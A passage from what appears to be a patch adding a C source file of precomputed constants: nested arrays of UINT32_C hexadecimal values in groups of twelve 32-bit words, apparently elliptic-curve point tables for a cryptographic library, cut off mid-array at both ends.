UINT32_C(0xEA0633FF), ++ UINT32_C(0x68DDDB5B), UINT32_C(0x8CB8AE07), UINT32_C(0x1A811AC7), ++ UINT32_C(0x892E7C84), UINT32_C(0x73664249), UINT32_C(0xC7EF19EB) }, ++ { UINT32_C(0xCD1489E3), UINT32_C(0xD1B5819A), UINT32_C(0xDE45D24A), ++ UINT32_C(0xF9C80FB0), UINT32_C(0x83BB7491), UINT32_C(0x045C21A6), ++ UINT32_C(0x73F7A47D), UINT32_C(0xA65325BE), UINT32_C(0x9C394F0C), ++ UINT32_C(0x08D09F0E), UINT32_C(0x268D4F08), UINT32_C(0xE7FB21C6) } }, ++ { { UINT32_C(0x6CA95C18), UINT32_C(0xC4CCAB95), UINT32_C(0xBC42E040), ++ UINT32_C(0x563FFD56), UINT32_C(0xE701C604), UINT32_C(0xFA3C64D8), ++ UINT32_C(0xB0ABAFEE), UINT32_C(0xC88D4426), UINT32_C(0x8542E4C3), ++ UINT32_C(0x1A353E5E), UINT32_C(0xED726186), UINT32_C(0x9A2D8B7C) }, ++ { UINT32_C(0x42D097FA), UINT32_C(0xD61CE190), UINT32_C(0x799A748B), ++ UINT32_C(0x6A63E280), UINT32_C(0x3225486B), UINT32_C(0x0F48D063), ++ UINT32_C(0x42A3C443), UINT32_C(0x848F8FE1), UINT32_C(0x8493CEF4), ++ UINT32_C(0x2CCDE250), UINT32_C(0x45E77E7C), UINT32_C(0x5450A508) } }, ++ { { UINT32_C(0x03112816), UINT32_C(0xD0F4E248), UINT32_C(0xCCBE9E16), ++ UINT32_C(0xFCAD9DDB), UINT32_C(0x5AE01EA0), UINT32_C(0x177999BF), ++ UINT32_C(0xCE832DCE), UINT32_C(0xD20C78B9), UINT32_C(0x50C8C646), ++ UINT32_C(0x3CC694FB), UINT32_C(0xC93D4887), UINT32_C(0x24D75968) }, ++ { UINT32_C(0x87BC08AF), UINT32_C(0x9F06366A), UINT32_C(0x7FD0DF2A), ++ UINT32_C(0x59FAB50E), UINT32_C(0x6C4CC234), UINT32_C(0x5FFCC7F7), ++ UINT32_C(0x65F52D86), UINT32_C(0x87198DD7), UINT32_C(0xA855DF04), ++ UINT32_C(0x5B9C94B0), UINT32_C(0x8A067AD7), UINT32_C(0xD8BA6C73) } }, ++ }, ++ { ++ { { UINT32_C(0x1C4C9D90), UINT32_C(0x9E9AF315), UINT32_C(0xD12E0A89), ++ UINT32_C(0x8665C5A9), UINT32_C(0x58286493), UINT32_C(0x204ABD92), ++ UINT32_C(0xB2E09205), UINT32_C(0x79959889), UINT32_C(0xFE56B101), ++ UINT32_C(0x0C727A3D), UINT32_C(0x8B657F26), UINT32_C(0xF366244C) }, ++ { UINT32_C(0xCCA65BE2), UINT32_C(0xDE35D954), UINT32_C(0xB0FD41CE), ++ UINT32_C(0x52EE1230), UINT32_C(0x36019FEE), UINT32_C(0xFA03261F), ++ UINT32_C(0x66511D8F), UINT32_C(0xAFDA42D9), UINT32_C(0x821148B9), ++ UINT32_C(0xF63211DD), UINT32_C(0x6F13A3E1), UINT32_C(0x7B56AF7E) } }, ++ { { UINT32_C(0x5913E184), UINT32_C(0x47FE4799), UINT32_C(0x82145900), ++ UINT32_C(0x5BBE584C), UINT32_C(0x9A867173), UINT32_C(0xB76CFA8B), ++ UINT32_C(0x514BF471), UINT32_C(0x9BC87BF0), UINT32_C(0x71DCF1FC), ++ UINT32_C(0x37392DCE), UINT32_C(0x3AD1EFA8), UINT32_C(0xEC3EFAE0) }, ++ { UINT32_C(0x14876451), UINT32_C(0xBBEA5A34), UINT32_C(0x6217090F), ++ UINT32_C(0x96E5F543), UINT32_C(0x9B1665A9), UINT32_C(0x5B3D4ECD), ++ UINT32_C(0xE329DF22), UINT32_C(0xE7B0DF26), UINT32_C(0x0BAA808D), ++ UINT32_C(0x18FB438E), UINT32_C(0xDD516FAF), UINT32_C(0x90757EBF) } }, ++ { { UINT32_C(0xD5A98D68), UINT32_C(0x1E6F9A95), UINT32_C(0x849DA828), ++ UINT32_C(0x759EA7DF), UINT32_C(0x6E8B4198), UINT32_C(0x365D5625), ++ UINT32_C(0x7A4A53F9), UINT32_C(0xE1B9C53B), UINT32_C(0xE32B9B16), ++ UINT32_C(0x55DC1D50), UINT32_C(0xBB6D5701), UINT32_C(0xA4657EBB) }, ++ { UINT32_C(0xEACC76E2), UINT32_C(0x4C270249), UINT32_C(0x162B1CC7), ++ UINT32_C(0xBE49EC75), UINT32_C(0x0689902B), UINT32_C(0x19A95B61), ++ UINT32_C(0xA4CFC5A8), UINT32_C(0xDD5706BF), UINT32_C(0x14E5B424), ++ UINT32_C(0xD33BDB73), UINT32_C(0xE69EBA87), UINT32_C(0x21311BD1) } }, ++ { { UINT32_C(0x72A21ACC), UINT32_C(0x75BA2F9B), UINT32_C(0xA28EDB4C), ++ UINT32_C(0x356688D4), UINT32_C(0x610D080F), UINT32_C(0x3C339E0B), ++ UINT32_C(0x33A99C2F), UINT32_C(0x614AC293), UINT32_C(0xAA580AFF), ++ UINT32_C(0xA5E23AF2), UINT32_C(0xE1FDBA3A), UINT32_C(0xA6BCB860) }, ++ { UINT32_C(0xB43F9425), UINT32_C(0xAA603365), UINT32_C(0xF7EE4635), ++ UINT32_C(0xAE8D7126), UINT32_C(0x56330A32), UINT32_C(0xA2B25244), ++ UINT32_C(0x9E025AA3), UINT32_C(0xC396B5BB), UINT32_C(0xF8A0D5CF), ++ UINT32_C(0xABBF77FA), UINT32_C(0xEA31C83B), UINT32_C(0xB322EE30) } }, ++ { { UINT32_C(0x7890E234), UINT32_C(0x04881384), UINT32_C(0x672E70C6), ++ UINT32_C(0x387F1159), UINT32_C(0x7B307F75), UINT32_C(0x1468A614), ++ UINT32_C(0xED85EC96), UINT32_C(0x56335B52), UINT32_C(0xD45BCAE9), ++ UINT32_C(0xDA1BB60F), UINT32_C(0xF9FAEADD), UINT32_C(0x4D94F3F0) }, ++ { UINT32_C(0xFC78D86B), UINT32_C(0x6C6A7183), UINT32_C(0x3018DEC6), ++ UINT32_C(0xA425B5C7), UINT32_C(0x2D877399), UINT32_C(0xB1549C33), ++ UINT32_C(0x92B2BC37), UINT32_C(0x6C41C50C), UINT32_C(0x83EE0DDB), ++ UINT32_C(0x3A9F380C), UINT32_C(0xC4599E73), UINT32_C(0xDED5FEB6) } }, ++ { { UINT32_C(0x0B7F8354), UINT32_C(0x14D34C21), UINT32_C(0x9177CE45), ++ UINT32_C(0x1475A1CD), UINT32_C(0x9B926E4B), UINT32_C(0x9F5F764A), ++ UINT32_C(0x05DD21FE), UINT32_C(0x77260D1E), UINT32_C(0xC4B937F7), ++ UINT32_C(0x3C882480), UINT32_C(0x722372F2), UINT32_C(0xC92DCD39) }, ++ { UINT32_C(0xEC6F657E), UINT32_C(0xF636A1BE), UINT32_C(0x1D30DD35), ++ UINT32_C(0xB0E6C312), UINT32_C(0xE4654EFE), UINT32_C(0xFE4B0528), ++ UINT32_C(0x21D230D2), UINT32_C(0x1C4A6820), UINT32_C(0x98FA45AB), ++ UINT32_C(0x615D2E48), UINT32_C(0x01FDBABF), UINT32_C(0x1F35D6D8) } }, ++ { { UINT32_C(0x3A7B10D1), UINT32_C(0xA636EEB8), UINT32_C(0xF4A29E73), ++ UINT32_C(0x4E1AE352), UINT32_C(0xE6BB1EC7), UINT32_C(0x01704F5F), ++ UINT32_C(0x0EF020AE), UINT32_C(0x75C04F72), UINT32_C(0x5A31E6A6), ++ UINT32_C(0x448D8CEE), UINT32_C(0x208F994B), UINT32_C(0xE40A9C29) }, ++ { UINT32_C(0xFD8F9D5D), UINT32_C(0x69E09A30), UINT32_C(0x449BAB7E), ++ UINT32_C(0xE6A5F7EB), UINT32_C(0x2AA1768B), UINT32_C(0xF25BC18A), ++ UINT32_C(0x3C841234), UINT32_C(0x9449E404), UINT32_C(0x016A7BEF), ++ UINT32_C(0x7A3BF43E), UINT32_C(0x2A150B60), UINT32_C(0xF25803E8) } }, ++ { { UINT32_C(0xB215F9E0), UINT32_C(0xE44A2A57), UINT32_C(0x19066F0A), ++ UINT32_C(0x38B34DCE), UINT32_C(0x40BB1BFB), UINT32_C(0x8BB91DAD), ++ UINT32_C(0xE67735FC), UINT32_C(0x64C9F775), UINT32_C(0x88D613CD), ++ UINT32_C(0xDE142417), UINT32_C(0x1901D88D), UINT32_C(0xC5014FF5) }, ++ { UINT32_C(0xF38116B0), UINT32_C(0xA250341D), UINT32_C(0x9D6CBCB2), ++ UINT32_C(0xF96B9DD4), UINT32_C(0x76B3FAC2), UINT32_C(0x15EC6C72), ++ UINT32_C(0x8124C1E9), UINT32_C(0x88F1952F), UINT32_C(0x975BE4F5), ++ UINT32_C(0x6B72F8EA), UINT32_C(0x061F7530), UINT32_C(0x23D288FF) } }, ++ { { UINT32_C(0xAFB96CE3), UINT32_C(0xEBFE3E5F), UINT32_C(0xB1979537), ++ UINT32_C(0x2275EDFB), UINT32_C(0xC97BA741), UINT32_C(0xC37AB9E8), ++ UINT32_C(0x63D7C626), UINT32_C(0x446E4B10), UINT32_C(0xD025EB02), ++ UINT32_C(0xB73E2DCE), UINT32_C(0x7669EEA7), UINT32_C(0x1F952B51) }, ++ { UINT32_C(0x6069A424), UINT32_C(0xABDD00F6), UINT32_C(0xDC298BFB), ++ UINT32_C(0x1C0F9D9B), UINT32_C(0xEB757B33), UINT32_C(0x831B1FD3), ++ UINT32_C(0x59D60B32), UINT32_C(0xD7DBE183), UINT32_C(0x9EF094B3), ++ UINT32_C(0x663D1F36), UINT32_C(0x67F7F11A), UINT32_C(0x1BD5732E) } }, ++ { { UINT32_C(0xC75D8892), UINT32_C(0x3C7FB3F5), UINT32_C(0xBA68DA69), ++ UINT32_C(0x2CFF9A0C), UINT32_C(0x60EC740B), UINT32_C(0x76455E8B), ++ UINT32_C(0x167B88F0), UINT32_C(0x4B8D67FF), UINT32_C(0x5A4186B1), ++ UINT32_C(0xEDEC0C02), UINT32_C(0xBEBF35AB), UINT32_C(0x127C462D) }, ++ { UINT32_C(0x049430FC), UINT32_C(0x9159C67E), UINT32_C(0xE7747320), ++ UINT32_C(0x86B21DD2), UINT32_C(0x0CF27B89), UINT32_C(0x0E0E0152), ++ UINT32_C(0xCD1316B6), UINT32_C(0x705F28F5), UINT32_C(0xBEAEA8A8), ++ UINT32_C(0x76751691), UINT32_C(0x360C5B69), UINT32_C(0x4C73E282) } }, ++ { { UINT32_C(0xFD7B3D74), UINT32_C(0x46BCC0D5), UINT32_C(0x0DC4F410), ++ UINT32_C(0x6F13C20E), UINT32_C(0x72F11CDF), UINT32_C(0x98A1AF7D), ++ UINT32_C(0x7928881C), UINT32_C(0x6099FD83), UINT32_C(0x371BB94B), ++ UINT32_C(0x66976356), UINT32_C(0x19B945AB), UINT32_C(0x673FBA72) }, ++ { UINT32_C(0xAED00700), UINT32_C(0xE4D8FA6E), UINT32_C(0x5C71A9F7), ++ UINT32_C(0xEA2313EC), UINT32_C(0xF99D4AEA), UINT32_C(0xF9ED8268), ++ UINT32_C(0x42AB59C7), UINT32_C(0xADD89164), UINT32_C(0x3F3A2D45), ++ UINT32_C(0xB37EB26F), UINT32_C(0xA924841E), UINT32_C(0x0B39BD7A) } }, ++ { { UINT32_C(0xE03CDBBB), UINT32_C(0xD811EB32), UINT32_C(0x7CC3610E), ++ UINT32_C(0x12055F1D), UINT32_C(0xA9046E3F), UINT32_C(0x6B23A1A0), ++ UINT32_C(0x9DD4A749), UINT32_C(0x4D712122), UINT32_C(0xB1BF0AC3), ++ UINT32_C(0xB0C2ACA1), UINT32_C(0xC1B0432F), UINT32_C(0x71EFF575) }, ++ { UINT32_C(0x2B44E285), UINT32_C(0x6CD81492), UINT32_C(0xD87E8D20), ++ UINT32_C(0x3088BD9C), UINT32_C(0xF567E8FA), UINT32_C(0xACE218E5), ++ UINT32_C(0xCF90CBBB), UINT32_C(0xB3FA0424), UINT32_C(0x770734D3), ++ UINT32_C(0xADBDA751), UINT32_C(0x5AD6569A), UINT32_C(0xBCD78BAD) } }, ++ { { UINT32_C(0x7F39641F), UINT32_C(0xCADB31FA), UINT32_C(0x825E5562), ++ UINT32_C(0x3EF3E295), UINT32_C(0xF4094C64), UINT32_C(0x4893C633), ++ UINT32_C(0x8ADDF432), UINT32_C(0x52F685F1), UINT32_C(0x7FDC9373), ++ UINT32_C(0x9FD887AB), UINT32_C(0xE8680E8B), UINT32_C(0x47A9ADA0) }, ++ { UINT32_C(0xF0CD44F6), UINT32_C(0x579313B7), UINT32_C(0xE188AE2E), ++ UINT32_C(0xAC4B8668), UINT32_C(0x8FB145BD), UINT32_C(0x648F4369), ++ UINT32_C(0x74629E31), UINT32_C(0xE0460AB3), UINT32_C(0x8FF2B05F), ++ UINT32_C(0xC25F2875), UINT32_C(0x2D31EAEA), UINT32_C(0x4720C2B6) } }, ++ { { UINT32_C(0x13D48F80), UINT32_C(0x4603CDF4), UINT32_C(0xA49725DA), ++ UINT32_C(0x9ADB50E2), UINT32_C(0x65DF63F0), UINT32_C(0x8CD33050), ++ UINT32_C(0xCD643003), UINT32_C(0x58D8B3BB), UINT32_C(0xB739826B), ++ UINT32_C(0x170A4F4A), UINT32_C(0x1EAD0E17), UINT32_C(0x857772B5) }, ++ { UINT32_C(0xE65320F1), UINT32_C(0x01B78152), UINT32_C(0xB7503FC0), ++ UINT32_C(0xA6B4D845), UINT32_C(0x3DD50798), UINT32_C(0x0F5089B9), ++ UINT32_C(0x5690B6BE), UINT32_C(0x488F200F), UINT32_C(0x9E096F36), ++ UINT32_C(0x220B4ADF), UINT32_C(0x8CE5BC7C), UINT32_C(0x474D7C9F) } }, ++ { { UINT32_C(0xC745F8C9), UINT32_C(0xFED8C058), UINT32_C(0x291262D1), ++ UINT32_C(0xB683179E), UINT32_C(0xD15EE88C), UINT32_C(0x26ABD367), ++ UINT32_C(0xF60A6249), UINT32_C(0x29E8EED3), UINT32_C(0x1E02D6E1), ++ UINT32_C(0xED6008BB), UINT32_C(0xA6B12B8D), UINT32_C(0xD82ECF4C) }, ++ { UINT32_C(0xAAE4FA22), UINT32_C(0x9929D021), UINT32_C(0x336A1AB3), ++ UINT32_C(0xBE4DEF14), UINT32_C(0x8C80A312), UINT32_C(0x529B7E09), ++ UINT32_C(0xEE0EB0CE), UINT32_C(0xB059188D), UINT32_C(0x16DEAB7F), ++ UINT32_C(0x1E42979A), UINT32_C(0x84EE9477), UINT32_C(0x24110349) } }, ++ { { UINT32_C(0x2BE579CC), UINT32_C(0xD6524685), UINT32_C(0xC456FDED), ++ UINT32_C(0x849316F1), UINT32_C(0x2D1B67DA), UINT32_C(0xC51B7DA4), ++ UINT32_C(0x41BC6D6A), UINT32_C(0xC25B539E), UINT32_C(0xA9BF8BED), ++ UINT32_C(0xE3B7CCA3), UINT32_C(0x045C15E4), UINT32_C(0x813EF18C) }, ++ { UINT32_C(0x697982C4), UINT32_C(0x5F3789A1), UINT32_C(0x8C435566), ++ UINT32_C(0x4C125369), UINT32_C(0xDC0A92C6), UINT32_C(0x00A7AE6E), ++ UINT32_C(0x2F64A053), UINT32_C(0x1ABC929B), UINT32_C(0x38666B44), ++ UINT32_C(0xF4925C4C), UINT32_C(0x0F3DE7F6), UINT32_C(0xA81044B0) } }, ++ }, ++ { ++ { { UINT32_C(0xC2EC3731), UINT32_C(0xBCC88422), UINT32_C(0x10DC4EC2), ++ UINT32_C(0x78A3E4D4), UINT32_C(0x2571D6B1), UINT32_C(0x745DA1EF), ++ UINT32_C(0x739A956E), UINT32_C(0xF01C2921), UINT32_C(0xE4BFFC16), ++ UINT32_C(0xEFFD8065), UINT32_C(0xF36FE72C), UINT32_C(0x6EFE62A1) }, ++ { UINT32_C(0x0F4629A4), UINT32_C(0xF49E90D2), UINT32_C(0x8CE646F4), ++ UINT32_C(0xADD1DCC7), UINT32_C(0xB7240D91), UINT32_C(0xCB78B583), ++ UINT32_C(0x03F8387F), UINT32_C(0x2E1A7C3C), UINT32_C(0x3200F2D9), ++ UINT32_C(0x16566C22), UINT32_C(0xAAF80A84), UINT32_C(0x2361B14B) } }, ++ { { UINT32_C(0xB5733309), UINT32_C(0xDB1CFFD2), UINT32_C(0x0F9DD939), ++ UINT32_C(0x24BC250B), UINT32_C(0xA3C1DB85), UINT32_C(0xA4181E5A), ++ UINT32_C(0xAC55D391), UINT32_C(0xE5183E51), UINT32_C(0xEFD270D0), ++ UINT32_C(0x2793D5EF), UINT32_C(0xC0631546), UINT32_C(0x7D56F63D) }, ++ { UINT32_C(0x0C1EE59D), UINT32_C(0xECB40A59), UINT32_C(0xBB5BFA2C), ++ UINT32_C(0xE613A9E4), UINT32_C(0x6C5830F9), UINT32_C(0xA89B14AB), ++ UINT32_C(0xA03F201E), UINT32_C(0x4DC477DC), UINT32_C(0xC88C54F6), ++ UINT32_C(0x5604F5DA), UINT32_C(0x2ACFC66E), UINT32_C(0xD49264DC) } }, ++ { { UINT32_C(0x1C4DFA95), UINT32_C(0x283DD7F0), UINT32_C(0x62C0B160), ++ UINT32_C(0xB898CC2C), UINT32_C(0x870282AA), UINT32_C(0xBA08C095), ++ UINT32_C(0xF4E36324), UINT32_C(0xB02B00D8), UINT32_C(0x604CECF2), ++ UINT32_C(0x53AADDC0), UINT32_C(0x84DDD24E), UINT32_C(0xF1F927D3) }, ++ { UINT32_C(0xE2ABC9E1), UINT32_C(0x34BC00A0), UINT32_C(0x60289F88), ++ UINT32_C(0x2DA1227D), UINT32_C(0xCEF68F74), UINT32_C(0x5228EAAA), ++ UINT32_C(0x3C029351), UINT32_C(0x40A790D2), UINT32_C(0x8442E3B7), ++ UINT32_C(0xE0E9AF5C), UINT32_C(0xA9F141E0), UINT32_C(0xA3214142) } }, ++ { { UINT32_C(0xF9A58E3D), UINT32_C(0x72F4949E), UINT32_C(0xA48660A6), ++ UINT32_C(0x738C700B), UINT32_C(0x092A5805), UINT32_C(0x71B04726), ++ UINT32_C(0x0F5CDB72), UINT32_C(0xAD5C3C11), UINT32_C(0x554BFC49), ++ UINT32_C(0xD4951F9E), UINT32_C(0x6131EBE7), UINT32_C(0xEE594EE5) }, ++ { UINT32_C(0x3C1AF0A9), UINT32_C(0x37DA59F3), UINT32_C(0xCB040A63), ++ UINT32_C(0xD7AFC73B), UINT32_C(0x4D89FA65), UINT32_C(0xD020962A), ++ UINT32_C(0x71D824F5), UINT32_C(0x2610C61E), UINT32_C(0x3C050E31), ++ UINT32_C(0x9C917DA7), UINT32_C(0xE6E7EBFB), UINT32_C(0x3840F92F) } }, ++ { { UINT32_C(0x8D8B8CED), UINT32_C(0x50FBD7FE), UINT32_C(0x47D240AE), ++ UINT32_C(0xC7282F75), UINT32_C(0x1930FF73), UINT32_C(0x79646A47), ++ UINT32_C(0x2F7F5A77), UINT32_C(0x2E0BAC4E), UINT32_C(0x26127E0B), ++ UINT32_C(0x0EE44FA5), UINT32_C(0x82BC2AA7), UINT32_C(0x678881B7) }, ++ { UINT32_C(0x67F5F497), UINT32_C(0xB9E5D384), UINT32_C(0xA9B7106B), ++ UINT32_C(0x8F94A7D4), UINT32_C(0x9D329F68), UINT32_C(0xBF7E0B07), ++ UINT32_C(0x45D192FB), UINT32_C(0x169B93EA), UINT32_C(0x20DBE8C0), ++ UINT32_C(0xCCAA9467), UINT32_C(0x938F9574), UINT32_C(0xD4513A50) } }, ++ { { UINT32_C(0x054CB874), UINT32_C(0x841C96B4), UINT32_C(0xA3C26834), ++ UINT32_C(0xD75B1AF1), UINT32_C(0xEE6575F0), UINT32_C(0x7237169D), ++ UINT32_C(0x0322AADC), UINT32_C(0xD71FC7E5), UINT32_C(0x949E3A8E), ++ UINT32_C(0xD7A23F1E), UINT32_C(0xDD31D8C7), UINT32_C(0x77E2D102) }, ++ { UINT32_C(0xD10F5A1F), UINT32_C(0x5AD69D09), UINT32_C(0xB99D9A0B), ++ UINT32_C(0x526C9CB4), UINT32_C(0x972B237D), UINT32_C(0x521BB10B), ++ UINT32_C(0xA326F342), UINT32_C(0x1E4CD42F), UINT32_C(0xF0F126CA), ++ UINT32_C(0x5BB6DB27), UINT32_C(0xA4A515AD), UINT32_C(0x587AF22C) } }, ++ { { UINT32_C(0xB12E542F), UINT32_C(0x1123A531), UINT32_C(0xB9EB2811), ++ UINT32_C(0x1D01A64D), UINT32_C(0xF2D70F87), UINT32_C(0xA4A3515B), ++ UINT32_C(0xB4BD0270), UINT32_C(0xFA205234), UINT32_C(0x5EDA26B9), ++ UINT32_C(0x74B81830), UINT32_C(0x56578E75), UINT32_C(0x9305D6E6) }, ++ { UINT32_C(0x9F11BE19), UINT32_C(0xF38E69DE), UINT32_C(0x44DBE89F), ++ UINT32_C(0x1E2A5C23), UINT32_C(0xFD286654), UINT32_C(0x1077E7BC), ++ UINT32_C(0x0FCA4741), UINT32_C(0xD3669894), UINT32_C(0x278F8497), ++ UINT32_C(0x893BF904), UINT32_C(0xEB3E14F4), UINT32_C(0xD6AC5F83) } }, ++ { { UINT32_C(0x488F5F74), UINT32_C(0x327B9DAB), UINT32_C(0xCAB7364F), ++ UINT32_C(0x2B44F4B8), UINT32_C(0x19B6C6BD), UINT32_C(0xB4A6D22D), ++ UINT32_C(0xFC77CD3E), UINT32_C(0xA087E613), UINT32_C(0xB0B49BC7), ++ UINT32_C(0x4558E327), UINT32_C(0xCD835D35), UINT32_C(0x188805BE) }, ++ { UINT32_C(0xC1DC1007), UINT32_C(0x592F293C), UINT32_C(0x6AF02B44), ++ UINT32_C(0xFAEE660F), UINT32_C(0x904035F2), UINT32_C(0x5BFBB3BF), ++ UINT32_C(0x79C07E70), UINT32_C(0xD7C9AE60), UINT32_C(0x234896C2), ++ UINT32_C(0xC5287DD4), UINT32_C(0xCB0E4121), UINT32_C(0xC4CE4523) } }, ++ { { UINT32_C(0x58344831), UINT32_C(0x3626B406), UINT32_C(0x8E55C984), ++ UINT32_C(0xABCCE356), UINT32_C(0x77241602), UINT32_C(0x495CC81C), ++ UINT32_C(0x6D70DF8F), UINT32_C(0x4FB79676), UINT32_C(0x5B071DCA), ++ UINT32_C(0x6354B37C), UINT32_C(0x8C0FC0AD), UINT32_C(0x2CAD80A4) }, ++ { UINT32_C(0xF68739B4), UINT32_C(0x18AADD51), UINT32_C(0x47F09C6C), ++ UINT32_C(0x1BFBB177), UINT32_C(0xA8FD51C4), UINT32_C(0x9355EA19), ++ UINT32_C(0xEE58DB7B), UINT32_C(0x3D512A84), UINT32_C(0xE9237640), ++ UINT32_C(0x70842AFD), UINT32_C(0xACAF858D), UINT32_C(0x36F515CA) } }, ++ { { UINT32_C(0x7E768B23), UINT32_C(0x3DDEC7C4), UINT32_C(0x036D43ED), ++ UINT32_C(0x97E13C53), UINT32_C(0x3A39AB5F), UINT32_C(0x871E5925), ++ UINT32_C(0x07E68E2B), UINT32_C(0x9AF292DE), UINT32_C(0x4A40112E), ++ UINT32_C(0x41158349), UINT32_C(0x3D4D97E6), UINT32_C(0xCDBB46AF) }, ++ { UINT32_C(0x3C0EBE40), UINT32_C(0x2F891293), UINT32_C(0x3EBAD1E5), ++ UINT32_C(0x696C7EEE), UINT32_C(0x33B50D99), UINT32_C(0x8A5F3B69), ++ UINT32_C(0x7ED47DDE), UINT32_C(0xB7BC4840), UINT32_C(0x1E6706D8), ++ UINT32_C(0x3A6F8E6C), UINT32_C(0x3D84BB8F), UINT32_C(0x6A147943) } }, ++ { { UINT32_C(0x603AE8D1), UINT32_C(0xEC3A9C78), UINT32_C(0x228C29E5), ++ UINT32_C(0xBFE07E37), UINT32_C(0x396DBC2B), UINT32_C(0xB0385C5B), ++ UINT32_C(0xDF85F41F), UINT32_C(0x7C14FE83), UINT32_C(0xADFD463E), ++ UINT32_C(0xE2E64676), UINT32_C(0x8BF9F23D), UINT32_C(0x5BEF10AA) }, ++ { UINT32_C(0xF6BAB6DA), UINT32_C(0xFA83EA0D), UINT32_C(0x966BF7E3), ++ UINT32_C(0xCD0C8BA5), UINT32_C(0x98501C2E), UINT32_C(0xD62216B4), ++ UINT32_C(0xC3E69F2D), UINT32_C(0xB7F298A4), UINT32_C(0x9C8740F4), ++ UINT32_C(0x42CEF13B), UINT32_C(0x0DD64307), UINT32_C(0xBB317E52) } }, ++ { { UINT32_C(0x3FFEE775), UINT32_C(0x22B6245C), UINT32_C(0xB37CE7AA), ++ UINT32_C(0x5C3F60BE), UINT32_C(0xE1FEC0DF), UINT32_C(0xDE195D40), ++ UINT32_C(0xA0A82074), UINT32_C(0x3BFAFBC5), UINT32_C(0xC72CA86A), ++ UINT32_C(0xC36EC86A), UINT32_C(0x13FD43EA), UINT32_C(0x56062851) }, ++ { UINT32_C(0x8E0B03A4), UINT32_C(0x8686BE80), UINT32_C(0xD540D440), ++ UINT32_C(0xC3BD1F93), UINT32_C(0xBF96CEC5), UINT32_C(0x13E4EBC0), ++ UINT32_C(0x9190C844), UINT32_C(0xE8E23984), UINT32_C(0x00844802), ++ UINT32_C(0x183593A6), UINT32_C(0x4D206878), UINT32_C(0x46716879) } }, ++ { { UINT32_C(0xB6F63D19), UINT32_C(0x358F394D), UINT32_C(0x6B052194), ++ UINT32_C(0xA75D4849), UINT32_C(0x5C8D7975), UINT32_C(0x58403590), ++ UINT32_C(0x6CBFBD77), UINT32_C(0x86DC9B6B), UINT32_C(0x647A51E5), ++ UINT32_C(0x2DB04D77), UINT32_C(0xF8950D88), UINT32_C(0x5E9A5B02) }, ++ { UINT32_C(0x017168B0), UINT32_C(0xCE69A7E5), UINT32_C(0xC4843AD3), ++ UINT32_C(0x94630FAC), UINT32_C(0x1EFC44FF), UINT32_C(0xB3B9D736), ++ UINT32_C(0xB14D7F93), UINT32_C(0xE729E9B6), UINT32_C(0xE0ED0ABC), ++ UINT32_C(0xA071FC60), UINT32_C(0x8C8D9B83), UINT32_C(0xFC1A9971) } }, ++ { { UINT32_C(0xD138E975), UINT32_C(0x49686031), UINT32_C(0x5A8EF0D1), ++ UINT32_C(0x64864038), UINT32_C(0xE7F7DE49), UINT32_C(0x32679713), ++ UINT32_C(0x29D1CD1D), UINT32_C(0x59132349), UINT32_C(0x20BE9ED2), ++ UINT32_C(0x849AA23A), UINT32_C(0x284B3F33), UINT32_C(0x15D303E1) }, ++ { UINT32_C(0xB63F9FE9), UINT32_C(0x37309475), UINT32_C(0x45B7256A), ++ UINT32_C(0x327BAC8B), UINT32_C(0xD17FC5D3), UINT32_C(0x291CD227), ++ UINT32_C(0xA973EDF1), UINT32_C(0x8291D8CD), UINT32_C(0x437ABA09), ++ UINT32_C(0xF3843562), UINT32_C(0x271D0785), UINT32_C(0x33FFB704) } }, ++ { { UINT32_C(0x47E11E5E), UINT32_C(0x5248D6E4), UINT32_C(0x269C7ED3), ++ UINT32_C(0x0F66FC3C), UINT32_C(0x903E346E), UINT32_C(0x18C0D2B9), ++ UINT32_C(0x4BEAE1B8), UINT32_C(0xD81D9D97), UINT32_C(0xFC30FDF3), ++ UINT32_C(0x610326B0), UINT32_C(0x19A7DFCD), UINT32_C(0x2B136870) }, ++ { UINT32_C(0xB9527676), UINT32_C(0xEC75F70A), UINT32_C(0x29A3D897), ++ UINT32_C(0x90829F51), UINT32_C(0x97980302), UINT32_C(0x92FE1809), ++ UINT32_C(0x68474991), UINT32_C(0xA3F2498E), UINT32_C(0x0F22BBAD), ++ UINT32_C(0x6A66307B), UINT32_C(0x20378557), UINT32_C(0x32014B91) } }, ++ { { UINT32_C(0x3CD98610), UINT32_C(0x72CD7D55), UINT32_C(0x74504ADF), ++ UINT32_C(0xC3D560B0), UINT32_C(0xCEBB5D5D), UINT32_C(0x23F0A982), ++ UINT32_C(0xB839DDB8), UINT32_C(0x1431C15B), UINT32_C(0xCEB72207), ++ UINT32_C(0x7E207CD8), UINT32_C(0xE7EFB28D), UINT32_C(0x28E0A848) }, ++ { UINT32_C(0x1BD96F6E), UINT32_C(0xD22561FE), UINT32_C(0x62A8236B), ++ UINT32_C(0x04812C18), UINT32_C(0x975491FA), UINT32_C(0xA0BF2334), ++ UINT32_C(0x435DF87F), UINT32_C(0x294F42A6), UINT32_C(0xA5D6F4F6), ++ UINT32_C(0x2772B783), UINT32_C(0x2724F853), UINT32_C(0x348F92ED) } }, ++ }, ++ { ++ { { UINT32_C(0x1A42E5E7), UINT32_C(0xC20FB911), UINT32_C(0x81D12863), ++ UINT32_C(0x075A678B), UINT32_C(0x5CC0AA89), UINT32_C(0x12BCBC6A), ++ UINT32_C(0x4FB9F01E), UINT32_C(0x5279C6AB), UINT32_C(0x11AE1B89), ++ UINT32_C(0xBC8E1789), UINT32_C(0xC290003C), UINT32_C(0xAE74A706) }, ++ { UINT32_C(0x79DF3F45), UINT32_C(0x9949D6EC), UINT32_C(0x96C8D37F), ++ UINT32_C(0xBA18E262), UINT32_C(0xDD2275BF), UINT32_C(0x68DE6EE2), ++ UINT32_C(0xC419F1D5), UINT32_C(0xA9E4FFF8), UINT32_C(0xA52B5A40), ++ UINT32_C(0xBC759CA4), UINT32_C(0x63B0996D), UINT32_C(0xFF18CBD8) } }, ++ { { UINT32_C(0xD7DD47E5), UINT32_C(0x73C57FDE), UINT32_C(0xD49A7F5D), ++ UINT32_C(0xB0FE5479), UINT32_C(0xCFB9821E), UINT32_C(0xD25C71F1), ++ UINT32_C(0xCF6A1D68), UINT32_C(0x9427E209), UINT32_C(0xACD24E64), ++ UINT32_C(0xBF3C3916), UINT32_C(0xBDA7B8B5), UINT32_C(0x7E9F5583) }, ++ { UINT32_C(0xCF971E11), UINT32_C(0xE7C5F7C8), UINT32_C(0x3C7F035E), ++ UINT32_C(0xEC16D5D7), UINT32_C(0xE66B277C), UINT32_C(0x818DC472), ++ UINT32_C(0xB2816F1E), UINT32_C(0x4413FD47), UINT32_C(0x48383C6D), ++ 